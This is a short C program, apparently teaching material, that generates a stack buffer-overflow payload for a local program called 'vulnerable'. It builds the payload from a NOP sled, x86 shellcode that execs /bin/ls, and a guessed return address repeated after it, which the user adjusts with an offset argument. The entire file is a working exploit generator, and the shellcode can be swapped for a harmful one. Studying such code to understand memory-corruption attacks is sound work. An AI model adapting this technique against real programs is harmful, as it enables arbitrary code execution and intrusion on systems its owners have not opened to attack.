#include <string.h>
#include <stdio.h>


/* Generates a string that will overflow the buffer in the
   progrm "vulnerable" and will run /bin/ls
*/

unsigned char pgm[] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
    0x31, 0xc9, 0x51, 0xeb, 0x1b, 0x58, 0x88, 0x48,
    0x07, 0x89, 0x40, 0x08, 0x89, 0x48, 0x0c, 0x8d,
    0x58, 0x08, 0x53, 0x50, 0x31, 0xc0, 0xb0, 0x3b,
    0x50, 0xcd, 0x80, 0x83, 0xc4, 0x0c, 0xc9, 0xc3,
    0xe8, 0xe0, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69,
    0x6e, 0x2f, 0x6c, 0x73, 0x01, 0x01, 0x01, 0x01,
    0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01
  };

/* This value depends on the target program - it is a guess of the
   new return-address */
   
unsigned int target = 0xbfbfd238;

// 0x0xbfffd1e8; // 0xbffff8f4;  

int main(int argc, char **argv) {
  unsigned char bigbuff[10000];
  int i;
  int n = strlen(pgm);
  if (argc!=2) {
    printf("Error - need an offset\n");
    exit();
  }

  target += atoi(argv[1]);
  memcpy(bigbuff,pgm,n);
  for (i=0;i<50;i++) {
    memcpy(bigbuff+n+i*4,&target,4);
  }

  write(1,bigbuff,n+4*50); 
}